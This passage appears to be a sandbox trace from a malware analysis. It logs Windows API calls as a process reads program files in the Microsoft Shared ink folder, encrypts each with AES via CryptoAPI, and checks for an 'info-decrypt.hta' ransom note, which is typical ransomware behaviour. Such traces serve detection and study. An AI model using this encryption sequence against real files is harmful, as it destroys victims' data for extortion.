CryptSetKeyParam (hKey=0xb7f490, dwParam=0x4, pbData=0x36d1518*=0x1, dwFlags=0x0) returned 1 [0208.756] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x1, pbData=0x36d14e4, dwFlags=0x0) returned 1 [0208.760] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53bc940*, pdwDataLen=0x6d8ed78*=0xc1490, dwBufLen=0xc1490 | out: pbData=0x53bc940*, pdwDataLen=0x6d8ed78*=0xc1490) returned 1 [0208.862] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36d1540*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x36d1540*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0208.863] CryptDestroyKey (hKey=0xb7f0d0) returned 1 [0208.863] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0208.863] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0208.864] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0208.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0208.864] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0208.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8db20) returned 1 [0208.867] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0208.867] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", lpFilePart=0x0) returned 0x43 [0208.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0208.867] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35bc7aa0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x35bc7aa0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x35bc7aa0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0208.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0208.867] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0208.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0208.867] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), fInfoLevelId=0x0, lpFileInformation=0x36d2410 | out: lpFileInformation=0x36d2410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90daefa5, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x90daefa5, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x69a5)) returned 1 [0208.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0208.868] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0208.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0208.868] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x27c [0208.868] GetFileType (hFile=0x27c) returned 0x1 [0208.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0208.868] GetFileType (hFile=0x27c) returned 0x1 [0208.868] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x69a5 [0208.868] ReadFile (in: hFile=0x27c, lpBuffer=0x3747014, nNumberOfBytesToRead=0x69a5, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x3747014*, lpNumberOfBytesRead=0x6d8edac*=0x69a5, lpOverlapped=0x0) returned 1 [0208.877] CloseHandle (hObject=0x27c) returned 1 [0208.878] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbdfb68) returned 1 [0208.879] CryptGenRandom (in: hProv=0xbdfb68, dwLen=0x10, pbBuffer=0x374dd10 | out: pbBuffer=0x374dd10) returned 1 [0209.371] CryptImportKey (in: hProv=0xbdfb68, pbData=0x380c804, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f250) returned 1 [0209.371] CryptContextAddRef (hProv=0xbdfb68, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.371] CryptContextAddRef (hProv=0xbdfb68, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.371] CryptDuplicateKey (in: hKey=0xb7f250, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f790) returned 1 [0209.371] CryptContextAddRef (hProv=0xbdfb68, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.371] CryptSetKeyParam (hKey=0xb7f790, dwParam=0x4, pbData=0x380c8e4*=0x1, dwFlags=0x0) returned 1 [0209.371] CryptSetKeyParam (hKey=0xb7f790, dwParam=0x1, pbData=0x380c8b0, dwFlags=0x0) returned 1 [0209.371] CryptEncrypt (in: hKey=0xb7f790, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x380c8f4*, pdwDataLen=0x6d8ed78*=0x69b0, dwBufLen=0x69b0 | out: pbData=0x380c8f4*, pdwDataLen=0x6d8ed78*=0x69b0) returned 1 [0209.371] CryptEncrypt (in: hKey=0xb7f790, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x38132c8*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x38132c8*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0209.373] CryptDestroyKey (hKey=0xb7f250) returned 1 [0209.373] CryptReleaseContext (hProv=0xbdfb68, dwFlags=0x0) returned 1 [0209.373] CryptReleaseContext (hProv=0xbdfb68, dwFlags=0x0) returned 1 [0209.373] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0209.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0209.373] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0209.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8db20) returned 1 [0209.375] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe", lpFilePart=0x0) returned 0x46 [0209.375] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", lpFilePart=0x0) returned 0x43 [0209.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0209.375] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35bc7aa0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x35bc7aa0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x35bc7aa0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0209.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0209.376] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe", lpFilePart=0x0) returned 0x46 [0209.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0209.376] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), fInfoLevelId=0x0, lpFileInformation=0x3814244 | out: lpFileInformation=0x3814244*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c92176b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c92176b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xdd6ec0f0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x2f200)) returned 1 [0209.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0209.376] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe", lpFilePart=0x0) returned 0x46 [0209.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0209.377] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x27c [0209.377] GetFileType (hFile=0x27c) returned 0x1 [0209.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0209.377] GetFileType (hFile=0x27c) returned 0x1 [0209.377] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x2f200 [0209.378] ReadFile (in: hFile=0x27c, lpBuffer=0xb2a3518, nNumberOfBytesToRead=0x2f200, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0xb2a3518*, lpNumberOfBytesRead=0x6d8edac*=0x2f200, lpOverlapped=0x0) returned 1 [0209.493] CloseHandle (hObject=0x27c) returned 1 [0209.493] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbe0360) returned 1 [0209.495] CryptGenRandom (in: hProv=0xbe0360, dwLen=0x10, pbBuffer=0x38147bc | out: pbBuffer=0x38147bc) returned 1 [0209.769] CryptImportKey (in: hProv=0xbe0360, pbData=0x3676a50, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7fc10) returned 1 [0209.769] CryptContextAddRef (hProv=0xbe0360, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.769] CryptContextAddRef (hProv=0xbe0360, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.769] CryptDuplicateKey (in: hKey=0xb7fc10, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f150) returned 1 [0209.769] CryptContextAddRef (hProv=0xbe0360, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.769] CryptSetKeyParam (hKey=0xb7f150, dwParam=0x4, pbData=0x3676b30*=0x1, dwFlags=0x0) returned 1 [0209.769] CryptSetKeyParam (hKey=0xb7f150, dwParam=0x1, pbData=0x3676afc, dwFlags=0x0) returned 1 [0209.770] CryptEncrypt (in: hKey=0xb7f150, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xb2d2738*, pdwDataLen=0x6d8ed78*=0x2f210, dwBufLen=0x2f210 | out: pbData=0xb2d2738*, pdwDataLen=0x6d8ed78*=0x2f210) returned 1 [0209.772] CryptEncrypt (in: hKey=0xb7f150, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3676b58*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x3676b58*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0209.774] CryptDestroyKey (hKey=0xb7fc10) returned 1 [0209.774] CryptReleaseContext (hProv=0xbe0360, dwFlags=0x0) returned 1 [0209.774] CryptReleaseContext (hProv=0xbe0360, dwFlags=0x0) returned 1 [0209.774] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe", lpFilePart=0x0) returned 0x46 [0209.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0209.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0209.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8db20) returned 1 [0209.777] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0209.777] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", lpFilePart=0x0) returned 0x43 [0209.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0209.777] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35bc7aa0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x35bc7aa0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x35bc7aa0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0209.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0209.778] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0209.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0209.778] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), fInfoLevelId=0x0, lpFileInformation=0x3677998 | out: lpFileInformation=0x3677998*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f4e4a1, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x92f4e4a1, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x92f9a75d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x186b84)) returned 1 [0209.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0209.778] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0209.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0209.779] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0209.779] GetFileType (hFile=0x32c) returned 0x1 [0209.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0209.779] GetFileType (hFile=0x32c) returned 0x1 [0209.779] GetFileSize (in: hFile=0x32c, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x186b84 [0209.779] ReadFile (in: hFile=0x32c, lpBuffer=0x15a61808, nNumberOfBytesToRead=0x186b84, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x15a61808*, lpNumberOfBytesRead=0x6d8edac*=0x186b84, lpOverlapped=0x0) returned 1 [0210.872] CloseHandle (hObject=0x32c) returned 1 [0210.873] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbdf9d0) returned 1 [0210.874] CryptGenRandom (in: hProv=0xbdf9d0, dwLen=0x10, pbBuffer=0x368fac0 | out: pbBuffer=0x368fac0) returned 1 [0211.165] CryptImportKey (in: hProv=0xbdf9d0, pbData=0x37a91a4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f110) returned 1 [0211.165] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.165] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.165] CryptDuplicateKey (in: hKey=0xb7f110, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f610) returned 1 [0211.165] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.165] CryptSetKeyParam (hKey=0xb7f610, dwParam=0x4, pbData=0x37a9284*=0x1, dwFlags=0x0) returned 1 [0211.165] CryptSetKeyParam (hKey=0xb7f610, dwParam=0x1, pbData=0x37a9250, dwFlags=0x0) returned 1 [0211.170] CryptEncrypt (in: hKey=0xb7f610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x15be83a8*, pdwDataLen=0x6d8ed78*=0x186b90, dwBufLen=0x186b90 | out: pbData=0x15be83a8*, pdwDataLen=0x6d8ed78*=0x186b90) returned 1 [0211.246] CryptEncrypt (in: hKey=0xb7f610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0a1c*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x35f0a1c*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0211.248] CryptDestroyKey (hKey=0xb7f110) returned 1 [0211.248] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0211.248] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0211.248] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0211.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0211.248] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0211.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8db20) returned 1 [0211.250] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe", lpFilePart=0x0) returned 0x4a [0211.250] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", lpFilePart=0x0) returned 0x43 [0211.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0211.251] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35bc7aa0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x35bc7aa0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x35bc7aa0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0211.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0211.251] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe", lpFilePart=0x0) returned 0x4a [0211.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0211.251] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe"), fInfoLevelId=0x0, lpFileInformation=0x35f186c | out: lpFileInformation=0x35f186c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c53a9c4, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5c53a9c4, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe29c9700, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe2800)) returned 1 [0211.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0211.252] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe", lpFilePart=0x0) returned 0x4a [0211.252] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0211.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0211.252] GetFileType (hFile=0x32c) returned 0x1 [0211.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0211.252] GetFileType (hFile=0x32c) returned 0x1 [0211.252] GetFileSize (in: hFile=0x32c, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0xe2800 [0211.252] ReadFile (in: hFile=0x32c, lpBuffer=0x15d6ef58, nNumberOfBytesToRead=0xe2800, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x15d6ef58*, lpNumberOfBytesRead=0x6d8edac*=0xe2800, lpOverlapped=0x0) returned 1 [0211.435] CloseHandle (hObject=0x32c) returned 1 [0211.435] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbdfbf0) returned 1 [0211.436] CryptGenRandom (in: hProv=0xbdfbf0, dwLen=0x10, pbBuffer=0x35f2174 | out: pbBuffer=0x35f2174) returned 1 [0211.927] CryptImportKey (in: hProv=0xbdfbf0, pbData=0x3701abc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f890) returned 1 [0211.927] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.927] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.927] CryptDuplicateKey (in: 